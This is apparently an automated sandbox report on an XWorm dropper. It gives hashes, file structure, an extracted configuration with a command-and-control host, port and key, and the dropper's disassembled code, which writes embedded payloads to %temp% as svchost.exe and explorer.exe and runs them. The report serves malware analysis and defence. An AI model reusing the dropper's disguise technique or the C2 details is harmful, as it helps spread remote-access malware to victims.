Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very low

Hash
 Hash Value
MD5
dc16ed5b1c1cbbaf35179701b1f4035e
Sha1
ec8e01c61fcea9d0560b31786e7eef37a0409fe3
Sha256
dd71110a6b7fb79b2949280611957646f76503f1bda866b06e74b9a74e54dc89
Sha384
ec742d6943746c549882a13d0e808c0122389b21a0559686fe4b8eefcd6c21c188568864274b03e69c0bb8aeeca0f9f2
Sha512
a4e3307131ebd98673f78aaba161a1de32fd835130cfe31cb73b39d67989c82b8c3a0f95d91e53d9e0e2705df2e5ba15d3904fa6471aa3f8ea94b63a84244a52
SSDeep
49152:QbA3j+MlTnnoIVuE8RjdEOR4IE0ZrmQrpbOx+jSHcZuHanlFeub8WqW:Qb32noKQfZrHVbfub6nloi8D
TLSH
90E5BF017F458D01E5191B37C2AB4500BBBB9C411AA2FF1BB9A977AD192D3D36C18ECB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual C++ 6.0 DLL (Debug)
Microsoft Visual C++ 7.0 - 8.0
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
File Structure
dc16ed5b1c1cbbaf35179701b1f4035e
Malicious
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.sdata
.rsrc
.reloc
Resources
RT_ICON
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
ID:0007
ID:0
ID:0008
ID:0
ID:0009
ID:0
ID:000A
ID:0
ID:0-preview.png
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
dc16ed5b1c1cbbaf35179701b1f4035e.decoded.vbs
Malicious
.Net Resources
Malicious
payload.Resources.resources
Malicious
_1
Malicious
Overlay_470db1ab.bin
Malicious
bvElR9l3e6M3DQU5UdF6aCm2nAId.bat
msblockinto.exe
Malicious
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.sdata
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
.Net Resources
mBW3kdM0SlgTNfrti4.7qrEQ39HaUTCJTB8nS
ybZv9vuBxOQ1YcVX6H.g5pmcghBmAo2PWEKlF
9uzsvDMU6rzTiSa2KoESj40IXyhi3x.vbe
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.didat
.rsrc
.reloc
Resources
PNG
ID:0065
ID:1033
ID:1033-preview.png
ID:0066
ID:1033
ID:1033-preview.png
RT_ICON
ID:0001
ID:1033
ID:0002
ID:1033
ID:0003
ID:1033
ID:0004
ID:1033
ID:0005
ID:1033
ID:0006
ID:1033
ID:0007
ID:1033
ID:1033-preview.png
RT_DIALOG
ID:0000
ID:1033
RT_STRING
ID:0007
ID:1033
ID:0008
ID:1033
ID:0009
ID:1033
ID:000A
ID:1033
ID:000B
ID:1033
ID:000C
ID:1033
ID:000D
ID:1033
ID:000E
ID:1033
ID:000F
ID:1033
ID:0010
ID:1033
RT_GROUP_CURSOR4
ID:0064
ID:1033
RT_MANIFEST
ID:0001
ID:1033
_2
Malicious
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Malware Configuration - XWorm config.
Config. Field
 Value
Mutex

Rx6I6TBczb3u2uDI
Hosts

tcp.cloudpub.ru
Port

54193
KEY

<wallacy2k>
USBNM

<Xwormmm>
LoggerPath

%Public%
family

xworm
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: C:\Users\Professor\Desktop\BitJoiner\payload\obj\Debug\payload.pdb
Module Name

payload.exe
Full Name

payload.exe
EntryPoint

System.Void payload.Main::Main()
Scope Name

payload.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

payload
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

6
Main Method

System.Void payload.Main::Main()
Main IL Instruction Count

189
Main IL

nop <null> ldc.i4.0 <null> stloc.s V_5 nop <null> ldloc.s V_5 brtrue.s IL_000E: ldloc.1 br IL_010C: nop ldloc.1 <null> ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.0 <null> ldloc.0 <null> ldc.i4.0 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::DivideObject(System.Object,System.Object) stloc.s V_4 ldloc.1 <null> ldloc.1 <null> ldc.i4.5 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) ldc.i4 150 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.s 9 box System.Int32 ldloc.s V_4 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::XorObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) stloc.1 <null> ldloc.0 <null> ldc.i4.s 10 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::DivideObject(System.Object,System.Object) ldloc.3 <null> ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.4 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::IntDivideObject(System.Object,System.Object) stloc.2 <null> ldloc.2 <null> ldc.i4.1 <null> box System.Int32 ldloc.0 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) ldc.i4.s 15 box System.Int32 ldloc.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::SubtractObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> ldloc.s V_6 ldc.i4.0 <null> box System.Int32 ldloc.1 <null> ldc.i4.1 <null> box System.Int32 ldloca.s V_13 ldloca.s V_6 call System.Boolean Microsoft.VisualBasic.CompilerServices.ObjectFlowControl/ForLoopControl::ForLoopInitObj(System.Object,System.Object,System.Object,System.Object,System.Object&,System.Object&) brfalse.s IL_010C: nop ldloc.2 <null> ldloc.0 <null> ldloc.2 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ModObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> br.s IL_00F6: ldloc.2 ldloc.2 <null> ldc.i4.5 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> nop <null> br.s IL_00FE: nop nop <null> ldloc.2 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brtrue.s IL_00E5: ldloc.2 nop <null> ldloc.s V_6 ldloc.s V_13 ldloca.s V_6 call System.Boolean Microsoft.VisualBasic.CompilerServices.ObjectFlowControl/ForLoopControl::ForNextCheckObj(System.Object,System.Object,System.Object&) brtrue.s IL_00D5: ldloc.2 nop <null> ldloc.s V_5 brtrue.s IL_0119: nop ldc.i4.1 <null> stloc.s V_5 br IL_0004: nop nop <null> br IL_01BF: ldloc.s V_5 ldstr %temp%\ call System.String System.Environment::ExpandEnvironmentVariables(System.String) stloc.s V_7 nop <null> ldloc.s V_7 ldstr svchost.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_8 ldloc.s V_7 ldstr \explorer.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_9 ldloc.s V_8 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0159: ldloc.s V_8 ldloc.s V_8 call System.Void System.IO.File::Delete(System.String) nop <null> ldloc.s V_8 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_016F: nop ldloc.s V_8 call System.Byte[] payload.My.Resources.Resources::get__1() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) nop <null> nop <null> ldloc.s V_9 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0181: ldloc.s V_9 ldloc.s V_9 call System.Void System.IO.File::Delete(System.String) nop <null> ldloc.s V_9 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_0197: nop ldloc.s V_9 call System.Byte[] payload.My.Resources.Resources::get__2() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) nop <null> nop <null> ldloc.s V_8 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.s V_9 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_01BA: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01BA: nop nop <null> ldc.i4.0 <null> stloc.s V_5 nop <null> ldloc.s V_5 box System.Boolean call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldloc.2 <null> ldc.i4.0 <null> box System.Int32 ldc.i4.0 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::CompareObjectEqual(System.Object,System.Object,System.Boolean) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::NotObject(System.Object) call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldloc.0 <null> ldc.i4.s 50 box System.Int32 ldc.i4.0 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Operators::ConditionalCompareObjectEqual(System.Object,System.Object,System.Boolean) box System.Boolean call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldc.i4.1 <null> box System.Boolean br.s IL_020E: nop ldc.i4.0 <null> box System.Boolean nop <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brtrue IL_011F: ldstr "%temp%\\" nop <null> ret <null>
Module Name

payload.exe
Full Name

payload.exe
EntryPoint

System.Void payload.Main::Main()
Scope Name

payload.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

payload
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

6
Main Method

System.Void payload.Main::Main()
Main IL Instruction Count

189
Main IL

nop <null> ldc.i4.0 <null> stloc.s V_5 nop <null> ldloc.s V_5 brtrue.s IL_000E: ldloc.1 br IL_010C: nop ldloc.1 <null> ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.0 <null> ldloc.0 <null> ldc.i4.0 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::DivideObject(System.Object,System.Object) stloc.s V_4 ldloc.1 <null> ldloc.1 <null> ldc.i4.5 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) ldc.i4 150 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.s 9 box System.Int32 ldloc.s V_4 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::XorObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) stloc.1 <null> ldloc.0 <null> ldc.i4.s 10 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::DivideObject(System.Object,System.Object) ldloc.3 <null> ldc.i4.s 50 box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) ldc.i4.4 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::IntDivideObject(System.Object,System.Object) stloc.2 <null> ldloc.2 <null> ldc.i4.1 <null> box System.Int32 ldloc.0 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) ldc.i4.s 15 box System.Int32 ldloc.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::MultiplyObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::SubtractObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> ldloc.s V_6 ldc.i4.0 <null> box System.Int32 ldloc.1 <null> ldc.i4.1 <null> box System.Int32 ldloca.s V_13 ldloca.s V_6 call System.Boolean Microsoft.VisualBasic.CompilerServices.ObjectFlowControl/ForLoopControl::ForLoopInitObj(System.Object,System.Object,System.Object,System.Object,System.Object&,System.Object&) brfalse.s IL_010C: nop ldloc.2 <null> ldloc.0 <null> ldloc.2 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ModObject(System.Object,System.Object) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> br.s IL_00F6: ldloc.2 ldloc.2 <null> ldc.i4.5 <null> box System.Int32 call System.Object Microsoft.VisualBasic.CompilerServices.Operators::AddObject(System.Object,System.Object) stloc.2 <null> nop <null> br.s IL_00FE: nop nop <null> ldloc.2 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brtrue.s IL_00E5: ldloc.2 nop <null> ldloc.s V_6 ldloc.s V_13 ldloca.s V_6 call System.Boolean Microsoft.VisualBasic.CompilerServices.ObjectFlowControl/ForLoopControl::ForNextCheckObj(System.Object,System.Object,System.Object&) brtrue.s IL_00D5: ldloc.2 nop <null> ldloc.s V_5 brtrue.s IL_0119: nop ldc.i4.1 <null> stloc.s V_5 br IL_0004: nop nop <null> br IL_01BF: ldloc.s V_5 ldstr %temp%\ call System.String System.Environment::ExpandEnvironmentVariables(System.String) stloc.s V_7 nop <null> ldloc.s V_7 ldstr svchost.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_8 ldloc.s V_7 ldstr \explorer.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_9 ldloc.s V_8 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0159: ldloc.s V_8 ldloc.s V_8 call System.Void System.IO.File::Delete(System.String) nop <null> ldloc.s V_8 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_016F: nop ldloc.s V_8 call System.Byte[] payload.My.Resources.Resources::get__1() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) nop <null> nop <null> ldloc.s V_9 call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0181: ldloc.s V_9 ldloc.s V_9 call System.Void System.IO.File::Delete(System.String) nop <null> ldloc.s V_9 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_0197: nop ldloc.s V_9 call System.Byte[] payload.My.Resources.Resources::get__2() call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) nop <null> nop <null> ldloc.s V_8 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.s V_9 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_01BA: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01BA: nop nop <null> ldc.i4.0 <null> stloc.s V_5 nop <null> ldloc.s V_5 box System.Boolean call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldloc.2 <null> ldc.i4.0 <null> box System.Int32 ldc.i4.0 <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::CompareObjectEqual(System.Object,System.Object,System.Boolean) call System.Object Microsoft.VisualBasic.CompilerServices.Operators::NotObject(System.Object) call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldloc.0 <null> ldc.i4.s 50 box System.Int32 ldc.i4.0 <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Operators::ConditionalCompareObjectEqual(System.Object,System.Object,System.Boolean) box System.Boolean call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brfalse.s IL_0208: ldc.i4.0 ldc.i4.1 <null> box System.Boolean br.s IL_020E: nop ldc.i4.0 <null> box System.Boolean nop <null> call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.Object) brtrue IL_011F: ldstr "%temp%\\" nop <null> ret <null>
Artefacts
Name
 Value
Mutex

Rx6I6TBczb3u2uDI
CnC

tcp.cloudpub.ru
Port

54193
dc16ed5b1c1cbbaf35179701b1f4035e (3.3 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙